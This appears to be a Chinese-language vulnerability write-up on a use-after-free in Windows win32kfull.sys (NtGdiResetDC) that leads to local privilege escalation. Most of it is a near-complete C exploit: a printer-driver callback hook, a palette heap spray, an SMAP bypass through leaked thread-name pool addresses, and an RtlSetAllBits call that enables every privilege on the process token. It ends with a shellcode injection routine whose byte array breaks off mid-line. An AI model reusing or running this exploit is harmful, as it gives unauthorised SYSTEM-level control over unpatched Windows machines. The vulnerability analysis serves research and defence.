该漏洞本身原理比较简单,而作为 Win10下的利用才是本篇文章的研究重点。
win32kfull.sys中的 N t G d i R e s e t D C \textcolor{cornflowerblue}{NtGdiResetDC} NtGdiResetDC函数存在 UAF漏洞,攻击者可以利用该漏洞进行本地权限提升。
windows_10 windows_10 20h2 windows_10 21h1 windows_10 1607 windows_10 1809 windows_10 1909 windows_10 2004 windows_11 windows_7 - sp1 windows_8.1 windows_rt_8.1 windows_server 20h2 windows_server 2004 windows_server_2008 - sp2 windows_server_2008 r2 windows_server_2012 windows_server_2012 r2 windows_server_2016 windows_server_2019 windows_server_2022
7.8 | 高危
用户层通过调用函数 R e s e t D C \textcolor{cornflowerblue}{ResetDC} ResetDC,进入到内核层 N t G d i R e s e t D C \textcolor{cornflowerblue}{NtGdiResetDC} NtGdiResetDC -> G r e R e s e t D C I n t e r n a l \textcolor{cornflowerblue}{GreResetDCInternal} GreResetDCInternal,主要漏洞点:
__int64 __usercall GreResetDCInternal@<rax>(HDC hdc@<rcx>, __int64 pdmw@<rdx>, int *a3@<r8>) { ... hdc_1 = hdc; DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc); dcobj_1 = dcobj; ... pdevob = *(_QWORD *)(dcobj_1 + 0x30); // 从旧的DC对象中获取dev if ( *(_DWORD *)(pdevob + 0x20) == 1 ) { // 创建新的DC hdcNew = (HDC)hdcOpenDCW(&qword_1C0141EB0, pdmw_1, 0i64, 0i64, *(_QWORD *)(pdevob + 0xA18)); hdcNew_1 = hdcNew; if ( hdcNew ) { *(_QWORD *)(pdevob + 0xA18) = 0i64; DCOBJ::DCOBJ((DCOBJ *)&dco, hdcNew); v14 = (_QWORD *)dco; if ( dco ) { if ( v12 ) *(_DWORD *)(dco + 0x78) = *(_DWORD *)(dco + 0x74); v14[308] = *(_QWORD *)(dcobj + 0x9A0); *(_QWORD *)(dcobj + 0x9A0) = 0i64; v14[309] = *(_QWORD *)(dcobj + 0x9A8); *(_QWORD *)(dcobj + 0x9A8) = 0i64; v15 = *(void (__fastcall **)(_QWORD, _QWORD))(pdevob + 0xAD0);// 函数是 UMPDDrvResetPDEV if ( v15 ) v15(*(_QWORD *)(pdevob + 0x720), *(_QWORD *)(v14[6] + 0x720i64));// 函数调用 GreAcquireHmgrSemaphore(); LOBYTE(v23) = 1; HmgSwapLockedHandleContents(hdc_1, 0i64, hdcNew_1, 0i64, v23);// 交换新旧DC句柄内容 GreReleaseHmgrSemaphore(); v7 = 1; } else { EngSetLastError((unsigned int)(dco + 6)); } XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dco); } } ... LABEL_21: XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁旧的 dc对象 if ( v7 ) { bDeleteDCInternal(hdcNew_1, 1i64, 0i64); // 由于之前已经交换了句柄,所以这里释放的是旧的DC DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc_1); v16 = dcobj; if ( !dcobj ) { EngSetLastError((unsigned int)(dcobj + 6)); LABEL_24: v7 = 0; LABEL_38: XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁新的 DC对象 return v7; } ... } ... }
line:11 h d c O p e n D C W \textcolor{cornflowerblue}{hdcOpenDCW} hdcOpenDCW函数内部会调用一个位于用户层的回调 D r v E n a b l e P D E V \textcolor{cornflowerblue}{DrvEnablePDEV} DrvEnablePDEV,具体调用链:
line:25 从旧的 dev对象中获取函数指针,正常情况下该指针指向的是 U M P D D r v R e s e t P D E V \textcolor{cornflowerblue}{UMPDDrvResetPDEV} UMPDDrvResetPDEV,应该是重置 DEV设备对象。
line:45 从这里开始将释放旧的 DC
从以上分析中可以看出一个问题,因为函数 h d c O p e n D C W \textcolor{cornflowerblue}{hdcOpenDCW} hdcOpenDCW会调用用户层的一个回调函数,所以 DC对象可能易受破坏。函数 G r e R e s e t D C I n t e r n a l \textcolor{cornflowerblue}{GreResetDCInternal} GreResetDCInternal后面会解锁并释放旧的 DC对象。于是,攻击者可以通过 HOOK用户层中相应的回调函数,再次调用 R e s e t D C \textcolor{cornflowerblue}{ResetDC} ResetDC同一个 DC句柄,这就使得内核重新调用函数 G r e R e s e t D C I n t e r n a l \textcolor{cornflowerblue}{GreResetDCInternal} GreResetDCInternal,但由于旧的 DC对象已经被释放,而 line:25仍是从旧的 dev对象中获取函数指针,并在 line:29 尝试调用,所以这是一个典型的 UAF漏洞。
总体利用流程如上图所示。首先在应用层 HOOK函数 D r v E n a b l e P D E V \textcolor{cornflowerblue}{DrvEnablePDEV} DrvEnablePDEV,然后创建一个全局打印机的 DC句柄 hdc,然后 R e s e t D C ( h d c ) \textcolor{orange}{ResetDC(hdc)} ResetDC(hdc),使内核执行函数 G r e R e s e t D C I n t e r n a l \textcolor{cornflowerblue}{GreResetDCInternal} GreResetDCInternal,并在其回调的过程中再次 R e s e t D C ( h d c ) \textcolor{orange}{ResetDC(hdc)} ResetDC(hdc),使得内核释放打印机的DC对象。利用 Palettes占位被释放掉的 DC对象中 DEV对象的内存,并伪造 DEV的 U M P D D r v R e s e t P D E V \textcolor{cornflowerblue}{UMPDDrvResetPDEV} UMPDDrvResetPDEV函数指针和参数,最终获得一个有限的(只限于接受一个参数,因为另一个参数不可控)任意内核函数调用的原语。 POC使用任意内核函数调用原语调用函数 R t l S e t A l l B i t s \textcolor{cornflowerblue}{RtlSetAllBits} RtlSetAllBits修改 Token的权限实现提权。
下 面 将 对 利 用 流 程 中 的 重 点 进 行 分 析 \textcolor{green}{下面将对利用流程中的重点进行分析} 下面将对利用流程中的重点进行分析
系统调色板(Palette)在堆喷中是比较常用到的,用户层调用函数 C r e a t e P a l e t t e \textcolor{cornflowerblue}{CreatePalette} CreatePalette对应的内核服务:
signed __int64 __fastcall NtGdiCreatePaletteInternal(char *a1, unsigned int palNumEntries){ ... if ( *(_WORD *)a1 != 0x300 || !palNumEntries ) // palNumEntries 来自应用层 // CreatePalette(LOGPALETTE* lPalette)的 // lPalette->palNumEntries // 校验lPalette->palVersion 和 lPalette->palNumEntries; v2 = 0i64; if ( v2 ) { ... PALMEMOBJ::bCreatePalette(&v5, 1i64, size); ... } ... } // __int64 __fastcall PALMEMOBJ::bCreatePalette(PALMEMOBJ *this, int a2, unsigned int size, unsigned int *a4, unsigned int a5, unsigned int a6, unsigned int a7, unsigned int a8) { ... if ( a2 == 1 ) { size = 4 * palNumEntries + 0x90; // 调色板对象实际要分配的大小计算方式, v12 = a8 & 0x102F00; if ( !palNumEntries ) return 0i64; goto LABEL_11; } ... LABEL_11: obj = AllocateObject(size, 8, 0); // 分配一个size大小的对象,属于LookasideList管理的分页池的内存 v14 = (struct _BASEOBJECT *)obj; *(_QWORD *)v10 = obj; if ( obj ) { ... ColorTabl = *(unsigned int **)(*(_QWORD *)v10 + 0x78i64); color = v26; // data来自lPalette->palPalEntry if ( v26 ) { for ( i = 0; i < palNumEntries_1; ++i ) // 向调色板的色彩板中填充颜色 { v23 = *color; ++color; *ColorTabl = v23; ++ColorTabl; } } ... }
可见调色板的大小和色彩都是可控的,因此可以用来进行堆喷的同时控制内存的数据。但要注意调色板所在内存的类型 @line:31,不是同类型的内存无法使用这种方式去堆喷。
void SprayPalettes(DWORD size){
WORD palNumEntries = (size-0x90)/4;
DWORD palSize = sizeof(LOGPALETTE) + (palNumEntries-1)*sizeof(PALETTEENTRY);
LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
PBYTE Color = (PBYTE)Palette+4;
// 根据实际情况可进行若干次如下的操作
首先查看 DEV对象所占的内存大小
所占内存大小是 0xE30( s i z e o f ( D E V O B J ) + s i z e o f ( P O O L _ H E A D E R ) \textcolor{orange}{sizeof(DEVOBJ)+sizeof(POOL\_HEADER)} sizeof(DEVOBJ)+sizeof(POOL_HEADER))。
调用 S p r a y P a l e t t e s ( 0 x E 20 ) \textcolor{orange}{SprayPalettes(0xE20)} SprayPalettes(0xE20)进行堆喷。
void SprayPalettes(DWORD size) { DWORD palCount = (size - 0x90) / 4; DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY); LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize); if (lPalette == NULL) { printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__); return; } // lPalette->PaletteEntry PCHAR Fake = (PCHAR)lPalette+4; // Fake BitmapHeader,不同版本系统需要根据调试做出微调 ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10; printf("[+] FakeBitmapHeader = %p\n", BitmapHeader); /* 1607: *(pdc+0x720) = BitmapHeader *(pdc+0xAD0) = RtlSetAllBits */ ((PULONG64)Fake)[0xD7] = BitmapHeader; ((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress; lPalette->palNumEntries = (WORD)palCount; lPalette->palVersion = 0x300; for(int i=0;i<0x1000;i++) CreatePalette(lPalette); }
[in] PRTL_BITMAP BitMapHeader // 指向描述位图的 RTL_BITMAP 结构的指针。 此结构必须已由 RtlInitializeBitMap 例程初始化。
void __stdcall RtlSetAllBits(PRTL_BITMAP BitMapHeader) { unsigned int *v1; // r8 unsigned __int64 size; // r9 v1 = BitMapHeader->Buffer; // size相当于是BitMapHeader->SizeOfBitMap 以2为底的对数减1,向下取整的结果 size = (unsigned __int64)(4 * (((BitMapHeader->SizeOfBitMap & 0x1F) != 0) + (BitMapHeader->SizeOfBitMap >> 5))) >> 2; if ( size ) { if ( (unsigned __int8)v1 & 4 ) { *v1 = -1; if ( !--size ) return; ++v1; } memset(v1, 0xFFu, 8 * (size >> 1)); if ( size & 1 ) v1[size - 1] = -1; } }
瞧,这个函数是多么令人感到惊喜,因为它会将目标内存写入 8 ∗ ( s i z e / 2 ) \textcolor{orange}{8*(size/2)} 8∗(size/2)个 0xFF,这要是目标内存为 T o k e n − > P r i v i l e g e \textcolor{orange}{Token->Privilege} Token−>Privilege,足以使对应的进程获得所有权限!
在 Win8及其之后的系统开启了 SMAP,意味着内核无法直接访问用户态空间下的数据,所以不能直接用位于用户空间的PRTL_BITMAP
的具体位置,这样就绕过了 SMAP。
static DWORD WINAPI LeakDemoThread(LPVOID lParam) { while (TRUE) { Sleep(0x1000 * 60 * 60 * 24 * 365); } return 0; } ULONG64 FakeBitmapHeader() { HANDLE hThread = INVALID_HANDLE_VALUE; DWORD dwThreadID; DWORD dwSize = 0x1000; PVOID payload = NULL; // 创建一个线程并立即挂起 hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID); if (hThread == INVALID_HANDLE_VALUE) { printf("[Error_%d] CreateThread failed.\n", __LINE__); exit(0); } payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); // BitmapHeader->Size *(PULONG64)payload = 0x40; // BitmapHeader->Buffer *(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48; UNICODE_STRING uzString; uzString.Buffer = (PWCHAR)payload; uzString.Length = dwSize; uzString.MaximumLength = 0xffff; // 将伪造的BitMapHeader结构设置到线程名中,使其位于内核池中,以绕过SMAP保护 NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString)); if (ntst != 0) { printf("[Error_%d] NtSetInformationThread failed.n", __LINE__); exit(0); } // 泄露线程名的地址 dwSize = 0x400*0x400; DWORD dwRetSize; PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo = (PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize); ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize); if (ntst != 0) { printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__); exit(0); } DWORD DesireSize = uzString.Length + sizeof(uzString); for (DWORD i = 0; i < SysPoolInfo->Count; i++) { if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) && SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize) { return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress; } } return 0; }
#include<windows.h> #include<winddi.h> #include<winspool.h> #include <winternl.h> #include <stdio.h> #include <Psapi.h> #pragma comment(lib, "Psapi.lib ") #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define ThreadNameInformation 0x26 #define SystemExtendedHandleInformation 64 #define SystemBigPoolInformation 66 using ZwQuerySystemInformation_t = NTSTATUS(*)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); using NtSetInformationThread_t = NTSTATUS(*)( HANDLE threadHandle, THREADINFOCLASS threadInformationClass, PVOID threadInformation, ULONG threadInformationLength); using DrvEnableDriver_t = BOOL(*)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded); using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver); using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver); using DrvDisableDriver_t = void(*)(); typedef struct _SYSTEM_BIGPOOL_ENTRY { union { PVOID VirtualAddress; ULONG_PTR NonPaged : 1; // Set to 1 if entry is nonpaged. }; SIZE_T SizeInBytes; union { UCHAR Tag[4]; ULONG TagUlong; }; } SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY; typedef struct _SYSTEM_BIGPOOL_INFORMATION { ULONG Count; SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; } SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION; typedef struct _SYSTEM_HANDLE { PVOID Object; HANDLE UniqueProcessId; HANDLE HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE, * PSYSTEM_HANDLE; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR HandleCount; ULONG_PTR Reserved; SYSTEM_HANDLE Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; namespace g { DrvEnablePDEV_t OldDrvEnablePDEV = 0; DrvEnableDriver_t DrvEnableDriver = 0; DrvDisableDriver_t DrvDisableDriver = 0; ZwQuerySystemInformation_t ZwQuerySystemInformation = 0; NtSetInformationThread_t NtSetInformationThread = 0; ULONG64 RtlSetAllBitsAddress = 0; PCHAR szKernelName = NULL; PCHAR szPrinterName = NULL; HANDLE hToken=INVALID_HANDLE_VALUE; ULONG64 KernelBase = 0; bool bIsTrigger = false; HDC hdc = 0; }; void Hook_DrvEnablePDEV(); ULONG64 GetKernelBase(); bool Init(); ULONG64 GetToken(); DHPDEV DrvEnablePDEV_Proxy( DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver); void Hook_DrvEnablePDEV(); static DWORD WINAPI LeakDemoThread(LPVOID lParam); ULONG64 FakeBitmapHeader(); void SprayPalettes(DWORD size); bool CheckPrivilege(HANDLE TokenHandle); DWORD getProcessId(const char* name); void SpawnShell(); ULONG64 GetKernelBase() { DWORD cReturn=0; char szDevName[MAX_PATH] = { 0 }; ULONG64 KernelBase = 0; EnumDeviceDrivers(NULL, 0, &cReturn); if (cReturn <= 0) { printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__); exit(-1); } PULONG64 DevList = (PULONG64)GlobalAlloc(GMEM_ZEROINIT, cReturn); if (DevList == NULL) { printf("[Error_%d] GetKernelBase(): Insufficient system resource.\n", __LINE__); exit(-1); } if (!EnumDeviceDrivers((LPVOID*)DevList, cReturn, &cReturn)) { printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__); exit(-1); } for (DWORD i = 0; i < cReturn / sizeof(DevList[0]); i++) { if (GetDeviceDriverBaseNameA((LPVOID)DevList[i], szDevName, MAX_PATH)) { char* LowerName = _strlwr(szDevName); if (!strncmp(LowerName, "nt",2)) { KernelBase = DevList[i]; g::szKernelName = strdup(szDevName); break; } } } free(DevList); return KernelBase; } bool Init() { HMODULE hNt = LoadLibraryA("ntdll"); if (hNt == NULL) { printf("[Error_%d] Init(): Can't find ntdll.",__LINE__); return FALSE; } g::ZwQuerySystemInformation = (ZwQuerySystemInformation_t)GetProcAddress(hNt, "NtQuerySystemInformation"); g::NtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hNt, "NtSetInformationThread"); if (g::NtSetInformationThread == NULL || g::ZwQuerySystemInformation == NULL) { printf("[Error_%d] Init(): Can't find target func.\n", __LINE__); return FALSE; } g::KernelBase = GetKernelBase(); HMODULE hKernel = LoadLibraryA(g::szKernelName); if (hKernel == NULL) { printf("[Error_%d] Init(): Can't find %s.", __LINE__, g::szKernelName); return FALSE; } ULONG64 RtlSetAllBitsProc = (ULONG64)GetProcAddress(hKernel, "RtlSetAllBits"); if (RtlSetAllBitsProc==0) { printf("[Error_%d] Init(): Can't find target func.\n", __LINE__); return FALSE; } g::RtlSetAllBitsAddress = RtlSetAllBitsProc - (ULONG64)hKernel + g::KernelBase; printf("[+] Found RtlSetAllBitsAddress = %p\n", g::RtlSetAllBitsAddress); return TRUE; } ULONG64 GetToken() { PSYSTEM_HANDLE_INFORMATION_EX sys_handle_info_ref = NULL; ULONG64 Token = 0; ULONG len = 20; NTSTATUS ntst = 0; OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &g::hToken); if (g::hToken == INVALID_HANDLE_VALUE) { printf("[Error_%d] GetToken(): OpenProcessToken failed.\n", __LINE__); return 0; } //获取本进程的EPROCESS do { len *= 2; sys_handle_info_ref = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(sys_handle_info_ref, len); ntst = g::ZwQuerySystemInformation( (SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation, sys_handle_info_ref, len, &len); } while (ntst == STATUS_INFO_LENGTH_MISMATCH); if (ntst != 0) { printf("[Error_%d] GetToken(): ZwQuerySystemInformation failed.\n", __LINE__); if (sys_handle_info_ref) free(sys_handle_info_ref); return 0; } DWORD pid = GetCurrentProcessId(); for (int i = 0; i < sys_handle_info_ref->HandleCount; i++) { if (g::hToken == sys_handle_info_ref->Handles[i].HandleValue && (HANDLE)pid == sys_handle_info_ref->Handles[i].UniqueProcessId) { Token = (ULONG64)sys_handle_info_ref->Handles[i].Object; break; } } if (sys_handle_info_ref) free(sys_handle_info_ref); printf("[+] Found current process token = %p\n",Token); return Token; } DHPDEV DrvEnablePDEV_Proxy( DEVMODEW* pdm, LPWSTR pwszLogAddress, ULONG cPat, HSURF* phsurfPatterns, ULONG cjCaps, ULONG* pdevcaps, ULONG cjDevInfo, DEVINFO* pdi, HDEV hdev, LPWSTR pwszDeviceName, HANDLE hDriver) { DHPDEV res; printf("[+] DrvEnablePDEV_Proxy called.\n"); res = g::OldDrvEnablePDEV(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver); if (g::bIsTrigger) { // 释放hdc g::bIsTrigger = FALSE; ResetDC(g::hdc, NULL); // UAF SprayPalettes(0xE20); } return res; } void Hook_DrvEnablePDEV() { DWORD cbBuf = 0; DWORD cbNeed,cReturned; PPRINTER_INFO_4 PrintInfo=NULL; DRVENABLEDATA DrvData; DWORD OldProtect; HANDLE hPrinter = INVALID_HANDLE_VALUE; //首先枚举本地安装的打印机,找到可用的 EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &cbNeed, &cReturned); if (cbNeed <= 0) { printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__); exit(-1); } PrintInfo = (PPRINTER_INFO_4)GlobalAlloc(GMEM_ZEROINIT, cbNeed); if (PrintInfo == NULL) { printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__); exit(-1); } if (!EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, (PBYTE)PrintInfo, cbNeed, &cbNeed, &cReturned) || cReturned<=0) { printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__); exit(-1); } // 循环查找打印机 for (DWORD i = 0; i < cReturned; i++) { if (!OpenPrinterA(PrintInfo[i].pPrinterName, &hPrinter, NULL)) { printf("[Error_%d] Hook_DrvEnablePDEV(): OpenPrinterA failed.\n", __LINE__); continue; } else { printf("[+] Using a available printer: %s.\n", PrintInfo[i].pPrinterName); g::szPrinterName = strdup(PrintInfo[i].pPrinterName); // 获取打印机驱动文件名 GetPrinterDriverA(hPrinter, NULL, 2, NULL, NULL, &cReturned); if (cReturned <= 0) { printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__); continue; } PDRIVER_INFO_2 DrvInfo = (PDRIVER_INFO_2)GlobalAlloc(GMEM_ZEROINIT, cReturned); if (DrvInfo == NULL) { printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__); continue; } if (!GetPrinterDriverA(hPrinter, NULL, 2, (PBYTE)DrvInfo, cReturned, &cReturned) || cReturned <= 0) { printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__); continue; } HMODULE hPrinterDrv = LoadLibraryExA(DrvInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH); if (hPrinterDrv == NULL) { printf("[Error_%d] Hook_DrvEnablePDEV(): LoadLibraryExA failed.\n", __LINE__); continue; } g::DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hPrinterDrv, "DrvEnableDriver"); g::DrvDisableDriver = (DrvDisableDriver_t)GetProcAddress(hPrinterDrv, "DrvDisableDriver"); if (g::DrvEnableDriver == NULL || g::DrvDisableDriver == NULL) { printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find target functions .\n", __LINE__); continue; } // 打开图形驱动,获取回调函数列表,里面有我们要HOOK的函数 if (!g::DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &DrvData)) { printf("[Error_%d] Hook_DrvEnablePDEV(): DrvEnableDriver failed.\n", __LINE__); continue; } if (!VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), PAGE_READWRITE, &OldProtect)) { printf("[Error_%d] Hook_DrvEnablePDEV(): VirtualProtect failed.\n", __LINE__); continue; } for (DWORD i = 0; i < DrvData.c; i++) { if (DrvData.pdrvfn[i].iFunc == INDEX_DrvEnablePDEV) { // 保存并HOOK g::OldDrvEnablePDEV = (DrvEnablePDEV_t)DrvData.pdrvfn[i].pfn; DrvData.pdrvfn[i].pfn = (PFN)DrvEnablePDEV_Proxy; break; } } } // 关闭图形驱动 g::DrvDisableDriver(); VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), OldProtect, &OldProtect); return; } } static DWORD WINAPI LeakDemoThread(LPVOID lParam) { while (TRUE) { Sleep(0x1000 * 60 * 60 * 24 * 365); } return 0; } ULONG64 FakeBitmapHeader() { HANDLE hThread = INVALID_HANDLE_VALUE; DWORD dwThreadID; DWORD dwSize = 0x1000; PVOID payload = NULL; hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID); if (hThread == INVALID_HANDLE_VALUE) { printf("[Error_%d] CreateThread failed.\n", __LINE__); exit(0); } payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE); // BitmapHeader->Size *(PULONG64)payload = 0x40; // BitmapHeader->Buffer *(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48; UNICODE_STRING uzString; uzString.Buffer = (PWCHAR)payload; uzString.Length = dwSize; uzString.MaximumLength = 0xffff; // 将伪造的BitMapHeader结构设置到线程名中,使其位于内核池中,以绕过SMAP保护 NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString)); if (ntst != 0) { printf("[Error_%d] NtSetInformationThread failed.\n", __LINE__); exit(0); } // 泄露线程名的地址 dwSize = 0x400*0x400; DWORD dwRetSize; PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo = (PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize); ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize); if (ntst != 0) { printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__); exit(0); } DWORD DesireSize = uzString.Length + sizeof(uzString); for (DWORD i = 0; i < SysPoolInfo->Count; i++) { if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) && SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize) { return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress; } } return 0; } void SprayPalettes(DWORD size) { DWORD palCount = (size - 0x90) / 4; DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY); LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize); if (lPalette == NULL) { printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__); return; } // lPalette->PaletteEntry PCHAR Fake = (PCHAR)lPalette+4; // Fake BitmapHeader ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10; printf("[+] FakeBitmapHeader = %p\n", BitmapHeader); /* 1607: *(pdc+0x720) = BitmapHeader *(pdc+0xAD0) = RtlSetAllBits */ ((PULONG64)Fake)[0xD7] = BitmapHeader; ((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress; lPalette->palNumEntries = (WORD)palCount; lPalette->palVersion = 0x300; for(int i=0;i<0x1000;i++) CreatePalette(lPalette); } bool CheckPrivilege(HANDLE TokenHandle) { BOOL isPrivilegeSet = FALSE; PRIVILEGE_SET privSet; LUID_AND_ATTRIBUTES Privileges[1]; LookupPrivilegeValue(NULL, "SeDebugPrivilege", &(Privileges[0].Luid)); Privileges[0].Attributes = 0; privSet.PrivilegeCount = 1; privSet.Control = PRIVILEGE_SET_ALL_NECESSARY; memcpy(privSet.Privilege, Privileges, sizeof(Privileges)); PrivilegeCheck(TokenHandle, &privSet, &isPrivilegeSet); return isPrivilegeSet; } DWORD getProcessId(const char* name) { DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded)) { printf("[Error_%d] EnumProcess failed...\n",__LINE__); exit(0); } // Calculate how many process identifiers were returned. cProcesses = cbNeeded / sizeof(DWORD); // Print the name and process identifier for each process. for (i = 0; i < cProcesses; i++) { if (aProcesses[i] != 0) { DWORD processID = aProcesses[i]; CHAR szProcessName[MAX_PATH] = "<unknown>"; // Get a handle to the process. HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, processID); // Get the process name. if (NULL != hProcess) { HMODULE hMod; DWORD cbNeeded; if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) { GetModuleBaseNameA(hProcess, hMod, szProcessName, sizeof(szProcessName) / sizeof(TCHAR)); } } // Print the process name and identifier. if (!lstrcmpA(szProcessName, name)) { CloseHandle(hProcess); return (processID); } // Release the handle to the process. CloseHandle(hProcess); } } return 0; } void SpawnShell() { HANDLE hSystemProcess = INVALID_HANDLE_VALUE; PVOID pLibRemote; HMODULE hKernel32 = GetModuleHandleA("Kernel32"); DWORD processID; unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \ "\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \ "\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \ "\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \ "\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \ "\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \ "\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \ "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \ "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \ "\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \ "\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \ "\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \ "\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \ 